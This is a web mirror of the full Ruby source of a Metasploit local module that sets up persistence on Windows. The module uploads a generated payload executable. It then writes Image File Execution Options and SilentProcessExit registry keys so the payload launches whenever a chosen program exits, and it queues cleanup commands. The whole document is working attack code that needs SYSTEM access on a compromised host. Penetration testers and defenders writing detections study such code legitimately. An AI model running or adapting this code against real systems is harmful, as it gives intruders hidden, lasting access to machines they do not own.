Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/persistence/image_exec_options.rb
31903 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::Windows::Registry

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12
  include Msf::Post::Windows::Priv

13
  include Msf::Exploit::Local::Persistence

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/windows/local/persistence_image_exec_options'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'Windows Silent Process Exit Persistence',

23
        'Description' => %q{

24
          Windows allows you to set up a debug process when a process exits.

25
          This module uploads a payload and declares that it is the debug

26
          process to launch when a specified process exits.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Mithun Shanbhag', # earliest author found

31
          'bwatters-r7', # msf module

32
        ],

33
        'Platform' => [ 'win' ],

34
        'SessionTypes' => [ 'meterpreter' ],

35
        'Targets' => [

36
          [ 'Automatic', {} ]

37
        ],

38
        'DefaultTarget' => 0,

39
        'DisclosureDate' => '2008-06-28',

40
        'Privileged' => true,

41
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],

42
        'References' => [

43
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

44
          ['ATT&CK', Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],

45
          ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']

46
        ],

47
        'Compat' => {

48
          'Meterpreter' => {

49
            'Commands' => %w[

50
              stdapi_sys_config_getenv

51
            ]

52
          }

53
        },

54
        'Notes' => {

55
          'Stability' => [CRASH_SAFE],

56
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

57
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

58
        }

59
      )

60
    )

61
    register_options([

62
      OptString.new('PAYLOAD_NAME',

63
                    [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),

64
      OptString.new('IMAGE_FILE', [true, 'Binary to "debug"', nil])

65


66
    ])

67
  end

68


69
  def writable_dir

70
    d = super

71
    return session.sys.config.getenv(d) if d.start_with?('%')

72


73
    d

74
  end

75


76
  def check

77
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value

78
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

79


80
    return CheckCode::Safe('You must be System to run this Module') unless is_system?

81


82
    CheckCode::Appears('Likely exploitable')

83
  end

84


85
  def upload_payload(dest_pathname)

86
    payload_exe = generate_payload_exe

87
    write_file(dest_pathname, payload_exe)

88
    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{dest_pathname}")

89
  end

90


91
  def validate_active_host

92
    unless is_system?

93
      fail_with(Failure::NoAccess, 'You must be System to run this Module')

94
    end

95


96
    begin

97
      print_status("Attempting Persistence on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")

98
    rescue Rex::Post::Meterpreter::RequestError => e

99
      elog(e)

100
      raise Msf::Exploit::Failed, 'Could not connect to session'

101
    end

102
  end

103


104
  def write_reg_keys(image_file, payload_pathname)

105
    reg_keys = []

106
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}",

107
                  value_name: 'GlobalFlag',

108
                  type: 'REG_DWORD',

109
                  value_value: 512)

110
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",

111
                  value_name: 'ReportingMode',

112
                  type: 'REG_DWORD',

113
                  value_value: 1)

114
    reg_keys.push(key_name: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}",

115
                  value_name: 'MonitorProcess',

116
                  type: 'REG_SZ',

117
                  value_value: payload_pathname)

118
    silent_process_exit_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit'

119
    registry_createkey(silent_process_exit_key) unless registry_key_exist?(silent_process_exit_key)

120
    reg_keys.each do |key|

121
      registry_createkey(key[:key_name]) unless registry_key_exist?(key[:key_name])

122
      vprint_status("Writing #{key[:value_name]} to #{key[:key_name]}")

123
      registry_setvaldata(key[:key_name], key[:value_name], key[:value_value], key[:type])

124
      unless registry_getvalinfo(key[:key_name], key[:value_name])

125
        print_error("Failed to set #{key[:value_name]} for #{key[:key_name]}")

126
        return false

127
      end

128
    end

129
  end

130


131
  def install_persistence

132
    validate_active_host

133
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))

134
    temp_path = writable_dir

135
    image_file = datastore['IMAGE_FILE']

136
    payload_pathname = temp_path + '\\' + payload_name + '.exe'

137
    vprint_status("Payload pathname = #{payload_pathname}")

138
    upload_payload(payload_pathname) if write_reg_keys(image_file, payload_pathname)

139
    @clean_up_rc << "rm #{payload_pathname}\n"

140
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{image_file}\" /v GlobalFlag /f\" -H\n"

141
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v ReportingMode /f\" -H\n"

142
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{image_file}\" /v MonitorProcess /f\" -H\n"

143
  end

144
end

145


146